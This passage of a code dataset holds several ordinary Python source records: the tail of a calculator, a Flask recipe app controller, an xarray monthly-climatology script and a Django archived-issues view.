first number: \"))\n b = float(input(\"Type second number: \"))\n except ValueError as error:\n msg_error(\"[ERROR]\", error)\n continue # ask again instead of returning unbound values\n\n return a, b\n\n\nif __name__ == '__main__':\n calc = Calculator()\n","repo_name":"rca0/playground","sub_path":"python/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"73064856104","text":"from flask import render_template, request, redirect, session, flash, jsonify\nfrom 
flask_app import app\nfrom flask_app.models import recipe\n\n# UPDATED ROUTES\n@app.route('/recipes')\ndef recipe_list_page():\n if 'user_id' not in session:\n print(\"No user logged in.\")\n return redirect('/login')\n else:\n session.pop('name', None)\n session.pop('description', None)\n session.pop('instructions', None)\n session.pop('date_cooked', None)\n session.pop('under_30', None)\n session.pop('id', None)\n return render_template('recipe_list.html')\n\n@app.route('/recipe/list')\ndef recipe_list():\n print(\"in recipe/list\")\n recipe_list = recipe.Recipe.get_all()\n return jsonify(recipe_list)\n\n@app.route('/recipe/create', methods=[\"post\"])\ndef create_recipe():\n # print(\"rf<30\"+request.form['under_30'])\n recipe_id = recipe.Recipe.save(request.form)\n data = {\n 'date_cooked' : request.form['date_cooked'],\n 'description' : request.form['description'],\n 'first_name' : request.form['first_name'],\n 'instructions' : request.form['instructions'],\n 'name' : request.form['name'],\n 'under_30' : request.form['under_30'],\n 'user_id' : request.form['user_id'],\n 'id' : recipe_id\n }\n return jsonify(data)\n \n\n@app.route('/recipe/edit/<int:recipe_id>')\ndef recipe_edit_page(recipe_id):\n if 'user_id' not in session:\n print(\"No user logged in.\")\n return redirect('/login')\n else:\n session['recipe_id'] = recipe_id\n return render_template('recipe_edit.html')\n \n\n@app.route('/recipe/get/<int:recipe_id>')\ndef get_one_recipe(recipe_id):\n print(\"in recipe/get\")\n recipe_dict = recipe.Recipe.get_one_by_id(recipe_id)\n return jsonify(recipe_dict)\n\n@app.route('/recipe/getSession')\ndef get_session_json():\n session_dict = {\n 'recipe_id' : session['recipe_id'],\n 'user_id' : session['user_id']\n }\n return jsonify(session_dict)\n\n\n@app.route('/recipe/update', methods=[\"post\"])\ndef update_recipe():\n print('entered update_recipe in python')\n results = recipe.Recipe.update(request.form)\n return jsonify(request.form)\n\n\n@app.route('/recipe/delete/<int:recipe_id>')\ndef delete_recipe(recipe_id):\n if 'user_id' not in session:\n print(\"No user logged in.\")\n return redirect('/login')\n else:\n result = recipe.Recipe.delete(recipe_id)\n return redirect('/recipes') # to avoid this redirect,\n # we could possibly have the delete link not point to \n # this route, but instead an 'onClick' in the JS that\n # removes the element by id# (i added that to the list of\n # recipes) and *then* fetches this route. 
Seems awfully\n # clunky and I wonder if there is a better way","repo_name":"tonyb650/recipes_ajax","sub_path":"flask_app/controllers/recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"70677227944","text":"\"\"\"\nFilename: calc_monthly_climatology.py\nAuthor: Damien Irving, irving.damien@gmail.com\nDescription: Calculate the monthly climatology\n\n\"\"\"\n\n# Import general Python modules\n\nimport sys, os, pdb\nimport argparse\nimport xarray as xr\nimport cmdline_provenance as cmdprov\n\ncwd = os.getcwd()\nrepo_dir = '/'\nfor directory in cwd.split('/')[1:]:\n repo_dir = os.path.join(repo_dir, directory)\n if directory == 'ocean-analysis':\n break\n\n\n# Define functions\n\ndef main(inargs):\n \"\"\"Run the program.\"\"\"\n\n dset = xr.open_mfdataset(inargs.infiles)\n if inargs.time_bounds:\n start, end = inargs.time_bounds\n dset = dset.sel(time=slice(start, end))\n clim_dset = dset.groupby('time.month').mean('time', keep_attrs=True)\n \n if 'history' in dset.attrs:\n history = dset.attrs['history']\n log = cmdprov.new_log(infile_history={inargs.infiles[0]: history}, git_repo=repo_dir)\n else:\n log = cmdprov.new_log(git_repo=repo_dir)\n clim_dset.attrs['history'] = log\n\n clim_dset.to_netcdf(inargs.outfile)\n\n\nif __name__ == '__main__':\n\n extra_info =\"\"\" \nauthor:\n Damien Irving, irving.damien@gmail.com\n \n\"\"\"\n\n description='Calculate the monthly climatology'\n parser = argparse.ArgumentParser(description=description,\n epilog=extra_info, \n argument_default=argparse.SUPPRESS,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument(\"infiles\", type=str, nargs='*', help=\"Input files\")\n parser.add_argument(\"outfile\", type=str, help=\"Output file name\")\n\n parser.add_argument(\"--time_bounds\", type=str, nargs=2, default=None, metavar=('START_DATE', 'END_DATE'),\n help=\"Time period [default = entire]\")\n\n args = parser.parse_args() \n main(args)\n","repo_name":"DamienIrving/ocean-analysis","sub_path":"data_processing/calc_monthly_climatology.py","file_name":"calc_monthly_climatology.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"36"} +{"seq_id":"39844146472","text":"\"\"\"\nIguana (c) by Marc Ammon, Moritz Fickenscher, Lukas Fridolin,\nMichael Gunselmann, Katrin Raab, Christian Strate\n\nIguana is licensed under a\nCreative Commons Attribution-ShareAlike 4.0 International License.\n\nYou should have received a copy of the license along with this\nwork. 
If not, see <http://creativecommons.org/licenses/by-sa/4.0/>.\n\"\"\"\nfrom django.views.generic.detail import DetailView\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\n\nfrom itertools import chain\nfrom lib.custom_model import get_r_object_or_404\nfrom issue.models import Issue\nfrom project.models import Project\n\n# NOTE: ugettext_lazy \"is essential when calls to these functions are located in code\n# paths that are executed at module load time.\"\nfrom django.utils.translation import ugettext as _, ugettext_lazy as _l\n\n\nclass ArchivedIssuesView(LoginRequiredMixin, UserPassesTestMixin, DetailView):\n template_name = 'archive/archived_issues_view.html'\n context_object_name = 'project'\n items_per_page_sprints = 5\n items_per_page_nosprint = 5\n item_list = None\n item_list_nosprint = None\n breadcrumb = _l('Archive')\n\n def get(self, *args, **kwargs):\n proj = get_r_object_or_404(self.request.user, Project, name_short=self.kwargs.get('project'))\n self.item_list = proj.sprint.order_by('-seqnum')\n self.item_list_nosprint = Issue.objects.filter(project__name_short=self.kwargs.get('project'),\n archived=True, sprint=None)\n return super(ArchivedIssuesView, self).get(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(ArchivedIssuesView, self).get_context_data(**kwargs)\n context['nbar'] = 'sprint'\n proj = get_r_object_or_404(self.request.user, Project, name_short=self.kwargs.get('project'))\n archived_issues_without_sprint = Issue.objects.filter(project__name_short=self.kwargs.get('project'),\n archived=True, sprint=None)\n context['archived_issues_without_sprint'] = archived_issues_without_sprint\n context['sprints_sorted'] = proj.sprint.order_by('-seqnum')\n # paginator sprints\n if self.item_list:\n paginator = Paginator(self.item_list, self.items_per_page_sprints)\n page = self.request.GET.get('page')\n if not page or not page.isdigit():\n items = paginator.page(1)\n else:\n try:\n items = self.getItemsUntilPage(paginator, page)\n except EmptyPage:\n items = self.getItemsUntilPage(paginator, paginator.num_pages)\n context['page_items'] = items\n # paginator issues without sprint\n if self.item_list_nosprint:\n paginator_nosprint = Paginator(self.item_list_nosprint, self.items_per_page_nosprint)\n page_nosprint = self.request.GET.get('page_nosprint')\n if not page_nosprint or not page_nosprint.isdigit():\n items_nosprint = paginator_nosprint.page(1)\n else:\n try:\n items_nosprint = self.getItemsUntilPage(paginator_nosprint, page_nosprint)\n except EmptyPage:\n items_nosprint = self.getItemsUntilPage(paginator_nosprint, paginator_nosprint.num_pages)\n context['page_items_nosprint'] = items_nosprint\n return context\n\n def get_object(self):\n return get_r_object_or_404(self.request.user, Project, name_short=self.kwargs.get('project'))\n\n def test_func(self):\n return get_r_object_or_404(self.request.user, Project,\n name_short=self.kwargs.get('project')).user_has_read_permissions(self.request.user)\n\n def getItemsUntilPage(self, paginator, pageNumber):\n # for more comments see ShowMoreMixin\n items = paginator.page(pageNumber)\n for i in reversed(range(1, int(pageNumber))):\n items.object_list = list(chain(paginator.page(i).object_list, items.object_list))\n return 
items\n","repo_name":"midas66/iguana","sub_path":"src/archive/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"}